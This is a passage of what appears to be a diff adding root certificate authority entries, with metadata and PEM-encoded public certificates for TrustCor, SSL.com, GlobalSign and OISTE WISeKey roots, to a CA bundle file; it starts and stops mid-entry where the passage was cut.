+IENpdHkxJDAiBgNVBAoMG1RydXN0Q29yIFN5c3RlbXMgUy4gZGUgUi5MLjEnMCUG +A1UECwweVHJ1c3RDb3IgQ2VydGlmaWNhdGUgQXV0aG9yaXR5MR8wHQYDVQQDDBZU +cnVzdENvciBSb290Q2VydCBDQS0xMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB +CgKCAQEAv463leLCJhJrMxnHQFgKq1mqjQCj/IDHUHuO1CAmujIS2CNUSSUQIpid +RtLByZ5OGy4sDjjzGiVoHKZaBeYei0i/mJZ0PmnK6bV4pQa81QBeCQryJ3pS/C3V +seq0iWEk8xoT26nPUu0MJLq5nux+AHT6k61sKZKuUbS701e/s/OojZz0JEsq1pme +9J7+wH5COucLlVPat2gOkEz7cD+PSiyU8ybdY2mplNgQTsVHCJCZGxdNuWxu72CV +EY4hgLW9oHPY0LJ3xEXqWib7ZnZ2+AYfYW0PVcWDtxBWcgYHpfOxGgMFZA6dWorW +hnAbJN7+KIor0Gqw/Hqi3LJ5DotlDwIDAQABo2MwYTAdBgNVHQ4EFgQU7mtJPHo/ +DeOxCbeKyKsZn3MzUOcwHwYDVR0jBBgwFoAU7mtJPHo/DeOxCbeKyKsZn3MzUOcw +DwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAYYwDQYJKoZIhvcNAQELBQAD +ggEBACUY1JGPE+6PHh0RU9otRCkZoB5rMZ5NDp6tPVxBb5UrJKF5mDo4Nvu7Zp5I +/5CQ7z3UuJu0h3U/IJvOcs+hVcFNZKIZBqEHMwwLKeXx6quj7LUKdJDHfXLy11yf +ke+Ri7fc7Waiz45mO7yfOgLgJ90WmMCV1Aqk5IGadZQ1nJBfiDcGrVmVCrDRZ9MZ +yonnMlo2HD6CqFqTvsbQZJG2z9m2GM/bftJlo6bEjhcxwft+dtvTheNYsnd6djts +L1Ac59v2Z3kf9YKVmgenFK+P3CghZwnS1k1aHBkcjndcw5QkPTJrS37UeJSDvjdN +zl/HHk484IkzlQsPpTLWPFp5LBk= +-----END CERTIFICATE----- + +# Issuer: CN=TrustCor RootCert CA-2 O=TrustCor Systems S. de R.L. OU=TrustCor Certificate Authority +# Subject: CN=TrustCor RootCert CA-2 O=TrustCor Systems S. de R.L. 
OU=TrustCor Certificate Authority +# Label: "TrustCor RootCert CA-2" +# Serial: 2711694510199101698 +# MD5 Fingerprint: a2:e1:f8:18:0b:ba:45:d5:c7:41:2a:bb:37:52:45:64 +# SHA1 Fingerprint: b8:be:6d:cb:56:f1:55:b9:63:d4:12:ca:4e:06:34:c7:94:b2:1c:c0 +# SHA256 Fingerprint: 07:53:e9:40:37:8c:1b:d5:e3:83:6e:39:5d:ae:a5:cb:83:9e:50:46:f1:bd:0e:ae:19:51:cf:10:fe:c7:c9:65 +-----BEGIN CERTIFICATE----- +MIIGLzCCBBegAwIBAgIIJaHfyjPLWQIwDQYJKoZIhvcNAQELBQAwgaQxCzAJBgNV +BAYTAlBBMQ8wDQYDVQQIDAZQYW5hbWExFDASBgNVBAcMC1BhbmFtYSBDaXR5MSQw +IgYDVQQKDBtUcnVzdENvciBTeXN0ZW1zIFMuIGRlIFIuTC4xJzAlBgNVBAsMHlRy +dXN0Q29yIENlcnRpZmljYXRlIEF1dGhvcml0eTEfMB0GA1UEAwwWVHJ1c3RDb3Ig +Um9vdENlcnQgQ0EtMjAeFw0xNjAyMDQxMjMyMjNaFw0zNDEyMzExNzI2MzlaMIGk +MQswCQYDVQQGEwJQQTEPMA0GA1UECAwGUGFuYW1hMRQwEgYDVQQHDAtQYW5hbWEg +Q2l0eTEkMCIGA1UECgwbVHJ1c3RDb3IgU3lzdGVtcyBTLiBkZSBSLkwuMScwJQYD +VQQLDB5UcnVzdENvciBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkxHzAdBgNVBAMMFlRy +dXN0Q29yIFJvb3RDZXJ0IENBLTIwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIK +AoICAQCnIG7CKqJiJJWQdsg4foDSq8GbZQWU9MEKENUCrO2fk8eHyLAnK0IMPQo+ +QVqedd2NyuCb7GgypGmSaIwLgQ5WoD4a3SwlFIIvl9NkRvRUqdw6VC0xK5mC8tkq +1+9xALgxpL56JAfDQiDyitSSBBtlVkxs1Pu2YVpHI7TYabS3OtB0PAx1oYxOdqHp +2yqlO/rOsP9+aij9JxzIsekp8VduZLTQwRVtDr4uDkbIXvRR/u8OYzo7cbrPb1nK +DOObXUm4TOJXsZiKQlecdu/vvdFoqNL0Cbt3Nb4lggjEFixEIFapRBF37120Hape +az6LMvYHL1cEksr1/p3C6eizjkxLAjHZ5DxIgif3GIJ2SDpxsROhOdUuxTTCHWKF +3wP+TfSvPd9cW436cOGlfifHhi5qjxLGhF5DUVCcGZt45vz27Ud+ez1m7xMTiF88 +oWP7+ayHNZ/zgp6kPwqcMWmLmaSISo5uZk3vFsQPeSghYA2FFn3XVDjxklb9tTNM +g9zXEJ9L/cb4Qr26fHMC4P99zVvh1Kxhe1fVSntb1IVYJ12/+CtgrKAmrhQhJ8Z3 +mjOAPF5GP/fDsaOGM8boXg25NSyqRsGFAnWAoOsk+xWq5Gd/bnc/9ASKL3x74xdh +8N0JqSDIvgmk0H5Ew7IwSjiqqewYmgeCK9u4nBit2uBGF6zPXQIDAQABo2MwYTAd +BgNVHQ4EFgQU2f4hQG6UnrybPZx9mCAZ5YwwYrIwHwYDVR0jBBgwFoAU2f4hQG6U +nrybPZx9mCAZ5YwwYrIwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAYYw +DQYJKoZIhvcNAQELBQADggIBAJ5Fngw7tu/hOsh80QA9z+LqBrWyOrsGS2h60COX +dKcs8AjYeVrXWoSK2BKaG9l9XE1wxaX5q+WjiYndAfrs3fnpkpfbsEZC89NiqpX+ +MWcUaViQCqoL7jcjx1BRtPV+nuN79+TMQjItSQzL/0kMmx40/W5ulop5A7Zv2wnL +/V9lFDfhOPXzYRZY5LVtDQsEGz9QLX+zx3oaFoBg+Iof6Rsqxvm6ARppv9JYx1RX +CI/hOWB3S6xZhBqI8d3LT3jX5+EzLfzuQfogsL7L9ziUwOHQhQ+77Sxzq+3+knYa +ZH9bDTMJBzN7Bj8RpFxwPIXAz+OQqIN3+tvmxYxoZxBnpVIt8MSZj3+/0WvitUfW +2dCFmU2Umw9Lje4AWkcdEQOsQRivh7dvDDqPys/cA8GiCcjl/YBeyGBCARsaU1q7 +N6a3vLqE6R5sGtRk2tRD/pOLS/IseRYQ1JMLiI+h2IYURpFHmygk71dSTlxCnKr3 +Sewn6EAes6aJInKc9Q0ztFijMDvd1GpUk74aTfOTlPf8hAs/hCBcNANExdqtvArB +As8e5ZTZ845b2EzwnexhF7sUMlQMAimTHpKG9n/v55IFDlndmQguLvqcAFLTxWYp +5KeXRKQOKIETNcX2b2TmQcTVL8w0RSXPQQCWPUouwpaYT05KnJe32x+SMsj/D1Fu +1uwJ +-----END CERTIFICATE----- + +# Issuer: CN=TrustCor ECA-1 O=TrustCor Systems S. de R.L. OU=TrustCor Certificate Authority +# Subject: CN=TrustCor ECA-1 O=TrustCor Systems S. de R.L. 
OU=TrustCor Certificate Authority +# Label: "TrustCor ECA-1" +# Serial: 9548242946988625984 +# MD5 Fingerprint: 27:92:23:1d:0a:f5:40:7c:e9:e6:6b:9d:d8:f5:e7:6c +# SHA1 Fingerprint: 58:d1:df:95:95:67:6b:63:c0:f0:5b:1c:17:4d:8b:84:0b:c8:78:bd +# SHA256 Fingerprint: 5a:88:5d:b1:9c:01:d9:12:c5:75:93:88:93:8c:af:bb:df:03:1a:b2:d4:8e:91:ee:15:58:9b:42:97:1d:03:9c +-----BEGIN CERTIFICATE----- +MIIEIDCCAwigAwIBAgIJAISCLF8cYtBAMA0GCSqGSIb3DQEBCwUAMIGcMQswCQYD +VQQGEwJQQTEPMA0GA1UECAwGUGFuYW1hMRQwEgYDVQQHDAtQYW5hbWEgQ2l0eTEk +MCIGA1UECgwbVHJ1c3RDb3IgU3lzdGVtcyBTLiBkZSBSLkwuMScwJQYDVQQLDB5U +cnVzdENvciBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkxFzAVBgNVBAMMDlRydXN0Q29y +IEVDQS0xMB4XDTE2MDIwNDEyMzIzM1oXDTI5MTIzMTE3MjgwN1owgZwxCzAJBgNV +BAYTAlBBMQ8wDQYDVQQIDAZQYW5hbWExFDASBgNVBAcMC1BhbmFtYSBDaXR5MSQw +IgYDVQQKDBtUcnVzdENvciBTeXN0ZW1zIFMuIGRlIFIuTC4xJzAlBgNVBAsMHlRy +dXN0Q29yIENlcnRpZmljYXRlIEF1dGhvcml0eTEXMBUGA1UEAwwOVHJ1c3RDb3Ig +RUNBLTEwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDPj+ARtZ+odnbb +3w9U73NjKYKtR8aja+3+XzP4Q1HpGjORMRegdMTUpwHmspI+ap3tDvl0mEDTPwOA +BoJA6LHip1GnHYMma6ve+heRK9jGrB6xnhkB1Zem6g23xFUfJ3zSCNV2HykVh0A5 +3ThFEXXQmqc04L/NyFIduUd+Dbi7xgz2c1cWWn5DkR9VOsZtRASqnKmcp0yJF4Ou +owReUoCLHhIlERnXDH19MURB6tuvsBzvgdAsxZohmz3tQjtQJvLsznFhBmIhVE5/ +wZ0+fyCMgMsq2JdiyIMzkX2woloPV+g7zPIlstR8L+xNxqE6FXrntl019fZISjZF +ZtS6mFjBAgMBAAGjYzBhMB0GA1UdDgQWBBREnkj1zG1I1KBLf/5ZJC+Dl5mahjAf +BgNVHSMEGDAWgBREnkj1zG1I1KBLf/5ZJC+Dl5mahjAPBgNVHRMBAf8EBTADAQH/ +MA4GA1UdDwEB/wQEAwIBhjANBgkqhkiG9w0BAQsFAAOCAQEABT41XBVwm8nHc2Fv +civUwo/yQ10CzsSUuZQRg2dd4mdsdXa/uwyqNsatR5Nj3B5+1t4u/ukZMjgDfxT2 +AHMsWbEhBuH7rBiVDKP/mZb3Kyeb1STMHd3BOuCYRLDE5D53sXOpZCz2HAF8P11F +hcCF5yWPldwX8zyfGm6wyuMdKulMY/okYWLW2n62HGz1Ah3UKt1VkOsqEUc8Ll50 +soIipX1TH0XsJ5F95yIW6MBoNtjG8U+ARDL54dHRHareqKucBK+tIA5kmE2la8BI +WJZpTdwHjFGTot+fDz2LYLSCjaoITmJF4PkL0uDgPFveXHEnJcLmA4GLEFPjx1Wi +tJ/X5g== +-----END CERTIFICATE----- + +# Issuer: CN=SSL.com Root Certification Authority RSA O=SSL Corporation +# Subject: CN=SSL.com Root Certification Authority RSA O=SSL Corporation +# Label: "SSL.com Root Certification Authority RSA" +# Serial: 8875640296558310041 +# MD5 Fingerprint: 86:69:12:c0:70:f1:ec:ac:ac:c2:d5:bc:a5:5b:a1:29 +# SHA1 Fingerprint: b7:ab:33:08:d1:ea:44:77:ba:14:80:12:5a:6f:bd:a9:36:49:0c:bb +# SHA256 Fingerprint: 85:66:6a:56:2e:e0:be:5c:e9:25:c1:d8:89:0a:6f:76:a8:7e:c1:6d:4d:7d:5f:29:ea:74:19:cf:20:12:3b:69 +-----BEGIN CERTIFICATE----- +MIIF3TCCA8WgAwIBAgIIeyyb0xaAMpkwDQYJKoZIhvcNAQELBQAwfDELMAkGA1UE +BhMCVVMxDjAMBgNVBAgMBVRleGFzMRAwDgYDVQQHDAdIb3VzdG9uMRgwFgYDVQQK +DA9TU0wgQ29ycG9yYXRpb24xMTAvBgNVBAMMKFNTTC5jb20gUm9vdCBDZXJ0aWZp +Y2F0aW9uIEF1dGhvcml0eSBSU0EwHhcNMTYwMjEyMTczOTM5WhcNNDEwMjEyMTcz +OTM5WjB8MQswCQYDVQQGEwJVUzEOMAwGA1UECAwFVGV4YXMxEDAOBgNVBAcMB0hv +dXN0b24xGDAWBgNVBAoMD1NTTCBDb3Jwb3JhdGlvbjExMC8GA1UEAwwoU1NMLmNv +bSBSb290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IFJTQTCCAiIwDQYJKoZIhvcN +AQEBBQADggIPADCCAgoCggIBAPkP3aMrfcvQKv7sZ4Wm5y4bunfh4/WvpOz6Sl2R +xFdHaxh3a3by/ZPkPQ/CFp4LZsNWlJ4Xg4XOVu/yFv0AYvUiCVToZRdOQbngT0aX +qhvIuG5iXmmxX9sqAn78bMrzQdjt0Oj8P2FI7bADFB0QDksZ4LtO7IZl/zbzXmcC +C52GVWH9ejjt/uIZALdvoVBidXQ8oPrIJZK0bnoix/geoeOy3ZExqysdBP+lSgQ3 +6YWkMyv94tZVNHwZpEpox7Ko07fKoZOI68GXvIz5HdkihCR0xwQ9aqkpk8zruFvh +/l8lqjRYyMEjVJ0bmBHDOJx+PYZspQ9AhnwC9FwCTyjLrnGfDzrIM/4RJTXq/LrF +YD3ZfBjVsqnTdXgDciLKOsMf7yzlLqn6niy2UUb9rwPW6mBo6oUWNmuF6R7As93E +JNyAKoFBbZQ+yODJgUEAnl6/f8UImKIYLEJAs/lvOCdLToD0PYFH4Ih86hzOtXVc +US4cK38acijnALXRdMbX5J+tB5O2UzU1/Dfkw/ZdFr4hc96SCvigY2q8lpJqPvi8 +ZVWb3vUNiSYE/CUapiVpy8JtynziWV+XrOvvLsi81xtZPCvM8hnIk2snYxnP/Okm 
++Mpxm3+T/jRnhE6Z6/yzeAkzcLpmpnbtG3PrGqUNxCITIJRWCk4sbE6x/c+cCbqi +M+2HAgMBAAGjYzBhMB0GA1UdDgQWBBTdBAkHovV6fVJTEpKV7jiAJQ2mWTAPBgNV +HRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFN0ECQei9Xp9UlMSkpXuOIAlDaZZMA4G +A1UdDwEB/wQEAwIBhjANBgkqhkiG9w0BAQsFAAOCAgEAIBgRlCn7Jp0cHh5wYfGV +cpNxJK1ok1iOMq8bs3AD/CUrdIWQPXhq9LmLpZc7tRiRux6n+UBbkflVma8eEdBc +Hadm47GUBwwyOabqG7B52B2ccETjit3E+ZUfijhDPwGFpUenPUayvOUiaPd7nNgs +PgohyC0zrL/FgZkxdMF1ccW+sfAjRfSda/wZY52jvATGGAslu1OJD7OAUN5F7kR/ +q5R4ZJjT9ijdh9hwZXT7DrkT66cPYakylszeu+1jTBi7qUD3oFRuIIhxdRjqerQ0 +cuAjJ3dctpDqhiVAq+8zD8ufgr6iIPv2tS0a5sKFsXQP+8hlAqRSAUfdSSLBv9jr +a6x+3uxjMxW3IwiPxg+NQVrdjsW5j+VFP3jbutIbQLH+cU0/4IGiul607BXgk90I +H37hVZkLId6Tngr75qNJvTYw/ud3sqB1l7UtgYgXZSD32pAAn8lSzDLKNXz1PQ/Y +K9f1JmzJBjSWFupwWRoyeXkLtoh/D1JIPb9s2KJELtFOt3JY04kTlf5Eq/jXixtu +nLwsoFvVagCvXzfh1foQC5ichucmj87w7G6KVwuA406ywKBjYZC6VWg3dGq2ktuf +oYYitmUnDuy2n0Jg5GfCtdpBC8TTi2EbvPofkSvXRAdeuims2cXp71NIWuuA8ShY +Ic2wBlX7Jz9TkHCpBB5XJ7k= +-----END CERTIFICATE----- + +# Issuer: CN=SSL.com Root Certification Authority ECC O=SSL Corporation +# Subject: CN=SSL.com Root Certification Authority ECC O=SSL Corporation +# Label: "SSL.com Root Certification Authority ECC" +# Serial: 8495723813297216424 +# MD5 Fingerprint: 2e:da:e4:39:7f:9c:8f:37:d1:70:9f:26:17:51:3a:8e +# SHA1 Fingerprint: c3:19:7c:39:24:e6:54:af:1b:c4:ab:20:95:7a:e2:c3:0e:13:02:6a +# SHA256 Fingerprint: 34:17:bb:06:cc:60:07:da:1b:96:1c:92:0b:8a:b4:ce:3f:ad:82:0e:4a:a3:0b:9a:cb:c4:a7:4e:bd:ce:bc:65 +-----BEGIN CERTIFICATE----- +MIICjTCCAhSgAwIBAgIIdebfy8FoW6gwCgYIKoZIzj0EAwIwfDELMAkGA1UEBhMC +VVMxDjAMBgNVBAgMBVRleGFzMRAwDgYDVQQHDAdIb3VzdG9uMRgwFgYDVQQKDA9T +U0wgQ29ycG9yYXRpb24xMTAvBgNVBAMMKFNTTC5jb20gUm9vdCBDZXJ0aWZpY2F0 +aW9uIEF1dGhvcml0eSBFQ0MwHhcNMTYwMjEyMTgxNDAzWhcNNDEwMjEyMTgxNDAz +WjB8MQswCQYDVQQGEwJVUzEOMAwGA1UECAwFVGV4YXMxEDAOBgNVBAcMB0hvdXN0 +b24xGDAWBgNVBAoMD1NTTCBDb3Jwb3JhdGlvbjExMC8GA1UEAwwoU1NMLmNvbSBS +b290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IEVDQzB2MBAGByqGSM49AgEGBSuB +BAAiA2IABEVuqVDEpiM2nl8ojRfLliJkP9x6jh3MCLOicSS6jkm5BBtHllirLZXI +7Z4INcgn64mMU1jrYor+8FsPazFSY0E7ic3s7LaNGdM0B9y7xgZ/wkWV7Mt/qCPg +CemB+vNH06NjMGEwHQYDVR0OBBYEFILRhXMw5zUE044CkvvlpNHEIejNMA8GA1Ud +EwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAUgtGFczDnNQTTjgKS++Wk0cQh6M0wDgYD +VR0PAQH/BAQDAgGGMAoGCCqGSM49BAMCA2cAMGQCMG/n61kRpGDPYbCWe+0F+S8T +kdzt5fxQaxFGRrMcIQBiu77D5+jNB5n5DQtdcj7EqgIwH7y6C+IwJPt8bYBVCpk+ +gA0z5Wajs6O7pdWLjwkspl1+4vAHCGht0nxpbl/f5Wpl +-----END CERTIFICATE----- + +# Issuer: CN=SSL.com EV Root Certification Authority RSA R2 O=SSL Corporation +# Subject: CN=SSL.com EV Root Certification Authority RSA R2 O=SSL Corporation +# Label: "SSL.com EV Root Certification Authority RSA R2" +# Serial: 6248227494352943350 +# MD5 Fingerprint: e1:1e:31:58:1a:ae:54:53:02:f6:17:6a:11:7b:4d:95 +# SHA1 Fingerprint: 74:3a:f0:52:9b:d0:32:a0:f4:4a:83:cd:d4:ba:a9:7b:7c:2e:c4:9a +# SHA256 Fingerprint: 2e:7b:f1:6c:c2:24:85:a7:bb:e2:aa:86:96:75:07:61:b0:ae:39:be:3b:2f:e9:d0:cc:6d:4e:f7:34:91:42:5c +-----BEGIN CERTIFICATE----- +MIIF6zCCA9OgAwIBAgIIVrYpzTS8ePYwDQYJKoZIhvcNAQELBQAwgYIxCzAJBgNV +BAYTAlVTMQ4wDAYDVQQIDAVUZXhhczEQMA4GA1UEBwwHSG91c3RvbjEYMBYGA1UE +CgwPU1NMIENvcnBvcmF0aW9uMTcwNQYDVQQDDC5TU0wuY29tIEVWIFJvb3QgQ2Vy +dGlmaWNhdGlvbiBBdXRob3JpdHkgUlNBIFIyMB4XDTE3MDUzMTE4MTQzN1oXDTQy +MDUzMDE4MTQzN1owgYIxCzAJBgNVBAYTAlVTMQ4wDAYDVQQIDAVUZXhhczEQMA4G +A1UEBwwHSG91c3RvbjEYMBYGA1UECgwPU1NMIENvcnBvcmF0aW9uMTcwNQYDVQQD +DC5TU0wuY29tIEVWIFJvb3QgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgUlNBIFIy +MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAjzZlQOHWTcDXtOlG2mvq 
+M0fNTPl9fb69LT3w23jhhqXZuglXaO1XPqDQCEGD5yhBJB/jchXQARr7XnAjssuf +OePPxU7Gkm0mxnu7s9onnQqG6YE3Bf7wcXHswxzpY6IXFJ3vG2fThVUCAtZJycxa +4bH3bzKfydQ7iEGonL3Lq9ttewkfokxykNorCPzPPFTOZw+oz12WGQvE43LrrdF9 +HSfvkusQv1vrO6/PgN3B0pYEW3p+pKk8OHakYo6gOV7qd89dAFmPZiw+B6KjBSYR +aZfqhbcPlgtLyEDhULouisv3D5oi53+aNxPN8k0TayHRwMwi8qFG9kRpnMphNQcA +b9ZhCBHqurj26bNg5U257J8UZslXWNvNh2n4ioYSA0e/ZhN2rHd9NCSFg83XqpyQ +Gp8hLH94t2S42Oim9HizVcuE0jLEeK6jj2HdzghTreyI/BXkmg3mnxp3zkyPuBQV +PWKchjgGAGYS5Fl2WlPAApiiECtoRHuOec4zSnaqW4EWG7WK2NAAe15itAnWhmMO +pgWVSbooi4iTsjQc2KRVbrcc0N6ZVTsj9CLg+SlmJuwgUHfbSguPvuUCYHBBXtSu +UDkiFCbLsjtzdFVHB3mBOagwE0TlBIqulhMlQg+5U8Sb/M3kHN48+qvWBkofZ6aY +MBzdLNvcGJVXZsb/XItW9XcCAwEAAaNjMGEwDwYDVR0TAQH/BAUwAwEB/zAfBgNV +HSMEGDAWgBT5YLvU49U09rj1BoAlp3PbRmmonjAdBgNVHQ4EFgQU+WC71OPVNPa4 +9QaAJadz20ZpqJ4wDgYDVR0PAQH/BAQDAgGGMA0GCSqGSIb3DQEBCwUAA4ICAQBW +s47LCp1Jjr+kxJG7ZhcFUZh1++VQLHqe8RT6q9OKPv+RKY9ji9i0qVQBDb6Thi/5 +Sm3HXvVX+cpVHBK+Rw82xd9qt9t1wkclf7nxY/hoLVUE0fKNsKTPvDxeH3jnpaAg +cLAExbf3cqfeIg29MyVGjGSSJuM+LmOW2puMPfgYCdcDzH2GguDKBAdRUNf/ktUM +79qGn5nX67evaOI5JpS6aLe/g9Pqemc9YmeuJeVy6OLk7K4S9ksrPJ/psEDzOFSz +/bdoyNrGj1E8svuR3Bznm53htw1yj+KkxKl4+esUrMZDBcJlOSgYAsOCsp0FvmXt +ll9ldDz7CTUue5wT/RsPXcdtgTpWD8w74a8CLyKsRspGPKAcTNZEtF4uXBVmCeEm +Kf7GUmG6sXP/wwyc5WxqlD8UykAWlYTzWamsX0xhk23RO8yilQwipmdnRC652dKK +QbNmC1r7fSOl8hqw/96bg5Qu0T/fkreRrwU7ZcegbLHNYhLDkBvjJc40vG93drEQ +w/cFGsDWr3RiSBd3kmmQYRzelYB0VI8YHMPzA9C/pEN1hlMYegouCRw2n5H9gooi +S9EOUCXdywMMF8mDAAhONU2Ki+3wApRmLER/y5UnlhetCTCstnEXbosX9hwJ1C07 +mKVx01QT2WDz9UtmT/rx7iASjbSsV7FFY6GsdqnC+w== +-----END CERTIFICATE----- + +# Issuer: CN=SSL.com EV Root Certification Authority ECC O=SSL Corporation +# Subject: CN=SSL.com EV Root Certification Authority ECC O=SSL Corporation +# Label: "SSL.com EV Root Certification Authority ECC" +# Serial: 3182246526754555285 +# MD5 Fingerprint: 59:53:22:65:83:42:01:54:c0:ce:42:b9:5a:7c:f2:90 +# SHA1 Fingerprint: 4c:dd:51:a3:d1:f5:20:32:14:b0:c6:c5:32:23:03:91:c7:46:42:6d +# SHA256 Fingerprint: 22:a2:c1:f7:bd:ed:70:4c:c1:e7:01:b5:f4:08:c3:10:88:0f:e9:56:b5:de:2a:4a:44:f9:9c:87:3a:25:a7:c8 +-----BEGIN CERTIFICATE----- +MIIClDCCAhqgAwIBAgIILCmcWxbtBZUwCgYIKoZIzj0EAwIwfzELMAkGA1UEBhMC +VVMxDjAMBgNVBAgMBVRleGFzMRAwDgYDVQQHDAdIb3VzdG9uMRgwFgYDVQQKDA9T +U0wgQ29ycG9yYXRpb24xNDAyBgNVBAMMK1NTTC5jb20gRVYgUm9vdCBDZXJ0aWZp +Y2F0aW9uIEF1dGhvcml0eSBFQ0MwHhcNMTYwMjEyMTgxNTIzWhcNNDEwMjEyMTgx +NTIzWjB/MQswCQYDVQQGEwJVUzEOMAwGA1UECAwFVGV4YXMxEDAOBgNVBAcMB0hv +dXN0b24xGDAWBgNVBAoMD1NTTCBDb3Jwb3JhdGlvbjE0MDIGA1UEAwwrU1NMLmNv +bSBFViBSb290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IEVDQzB2MBAGByqGSM49 +AgEGBSuBBAAiA2IABKoSR5CYG/vvw0AHgyBO8TCCogbR8pKGYfL2IWjKAMTH6kMA +VIbc/R/fALhBYlzccBYy3h+Z1MzFB8gIH2EWB1E9fVwHU+M1OIzfzZ/ZLg1Kthku +WnBaBu2+8KGwytAJKaNjMGEwHQYDVR0OBBYEFFvKXuXe0oGqzagtZFG22XKbl+ZP +MA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAUW8pe5d7SgarNqC1kUbbZcpuX +5k8wDgYDVR0PAQH/BAQDAgGGMAoGCCqGSM49BAMCA2gAMGUCMQCK5kCJN+vp1RPZ +ytRrJPOwPYdGWBrssd9v+1a6cGvHOMzosYxPD/fxZ3YOg9AeUY8CMD32IygmTMZg +h5Mmm7I1HrrW9zzRHM76JTymGoEVW/MSD2zuZYrJh6j5B+BimoxcSg== +-----END CERTIFICATE----- + +# Issuer: CN=GlobalSign O=GlobalSign OU=GlobalSign Root CA - R6 +# Subject: CN=GlobalSign O=GlobalSign OU=GlobalSign Root CA - R6 +# Label: "GlobalSign Root CA - R6" +# Serial: 1417766617973444989252670301619537 +# MD5 Fingerprint: 4f:dd:07:e4:d4:22:64:39:1e:0c:37:42:ea:d1:c6:ae +# SHA1 Fingerprint: 80:94:64:0e:b5:a7:a1:ca:11:9c:1f:dd:d5:9f:81:02:63:a7:fb:d1 +# SHA256 Fingerprint: 
2c:ab:ea:fe:37:d0:6c:a2:2a:ba:73:91:c0:03:3d:25:98:29:52:c4:53:64:73:49:76:3a:3a:b5:ad:6c:cf:69 +-----BEGIN CERTIFICATE----- +MIIFgzCCA2ugAwIBAgIORea7A4Mzw4VlSOb/RVEwDQYJKoZIhvcNAQEMBQAwTDEg +MB4GA1UECxMXR2xvYmFsU2lnbiBSb290IENBIC0gUjYxEzARBgNVBAoTCkdsb2Jh +bFNpZ24xEzARBgNVBAMTCkdsb2JhbFNpZ24wHhcNMTQxMjEwMDAwMDAwWhcNMzQx +MjEwMDAwMDAwWjBMMSAwHgYDVQQLExdHbG9iYWxTaWduIFJvb3QgQ0EgLSBSNjET +MBEGA1UEChMKR2xvYmFsU2lnbjETMBEGA1UEAxMKR2xvYmFsU2lnbjCCAiIwDQYJ +KoZIhvcNAQEBBQADggIPADCCAgoCggIBAJUH6HPKZvnsFMp7PPcNCPG0RQssgrRI +xutbPK6DuEGSMxSkb3/pKszGsIhrxbaJ0cay/xTOURQh7ErdG1rG1ofuTToVBu1k +ZguSgMpE3nOUTvOniX9PeGMIyBJQbUJmL025eShNUhqKGoC3GYEOfsSKvGRMIRxD +aNc9PIrFsmbVkJq3MQbFvuJtMgamHvm566qjuL++gmNQ0PAYid/kD3n16qIfKtJw +LnvnvJO7bVPiSHyMEAc4/2ayd2F+4OqMPKq0pPbzlUoSB239jLKJz9CgYXfIWHSw +1CM69106yqLbnQneXUQtkPGBzVeS+n68UARjNN9rkxi+azayOeSsJDa38O+2HBNX +k7besvjihbdzorg1qkXy4J02oW9UivFyVm4uiMVRQkQVlO6jxTiWm05OWgtH8wY2 +SXcwvHE35absIQh1/OZhFj931dmRl4QKbNQCTXTAFO39OfuD8l4UoQSwC+n+7o/h +bguyCLNhZglqsQY6ZZZZwPA1/cnaKI0aEYdwgQqomnUdnjqGBQCe24DWJfncBZ4n +WUx2OVvq+aWh2IMP0f/fMBH5hc8zSPXKbWQULHpYT9NLCEnFlWQaYw55PfWzjMpY +rZxCRXluDocZXFSxZba/jJvcE+kNb7gu3GduyYsRtYQUigAZcIN5kZeR1Bonvzce +MgfYFGM8KEyvAgMBAAGjYzBhMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8EBTAD +AQH/MB0GA1UdDgQWBBSubAWjkxPioufi1xzWx/B/yGdToDAfBgNVHSMEGDAWgBSu +bAWjkxPioufi1xzWx/B/yGdToDANBgkqhkiG9w0BAQwFAAOCAgEAgyXt6NH9lVLN +nsAEoJFp5lzQhN7craJP6Ed41mWYqVuoPId8AorRbrcWc+ZfwFSY1XS+wc3iEZGt +Ixg93eFyRJa0lV7Ae46ZeBZDE1ZXs6KzO7V33EByrKPrmzU+sQghoefEQzd5Mr61 +55wsTLxDKZmOMNOsIeDjHfrYBzN2VAAiKrlNIC5waNrlU/yDXNOd8v9EDERm8tLj +vUYAGm0CuiVdjaExUd1URhxN25mW7xocBFymFe944Hn+Xds+qkxV/ZoVqW/hpvvf +cDDpw+5CRu3CkwWJ+n1jez/QcYF8AOiYrg54NMMl+68KnyBr3TsTjxKM4kEaSHpz +oHdpx7Zcf4LIHv5YGygrqGytXm3ABdJ7t+uA/iU3/gKbaKxCXcPu9czc8FB10jZp +nOZ7BN9uBmm23goJSFmH63sUYHpkqmlD75HHTOwY3WzvUy2MmeFe8nI+z1TIvWfs +pA9MRf/TuTAjB0yPEL+GltmZWrSZVxykzLsViVO6LAUP5MSeGbEYNNVMnbrt9x+v +JJUEeKgDu+6B5dpffItKoZB0JaezPkvILFa9x8jvOOJckvB595yEunQtYQEgfn7R +8k8HWV+LLUNS60YMlOH1Zkd5d9VUWx+tJDfLRVpOoERIyNiwmcUVhAn21klJwGW4 +5hpxbqCo8YLoRT5s1gLXCmeDBVrJpBA= +-----END CERTIFICATE----- + +# Issuer: CN=OISTE WISeKey Global Root GC CA O=WISeKey OU=OISTE Foundation Endorsed +# Subject: CN=OISTE WISeKey Global Root GC CA O=WISeKey OU=OISTE Foundation Endorsed +# Label: "OISTE WISeKey Global Root GC CA" +# Serial: 44084345621038548146064804565436152554 +# MD5 Fingerprint: a9:d6:b9:2d:2f:93:64:f8:a5:69:ca:91:e9:68:07:23 +# SHA1 Fingerprint: e0:11:84:5e:34:de:be:88:81:b9:9c:f6:16:26:d1:96:1f:c3:b9:31 +# SHA256 Fingerprint: 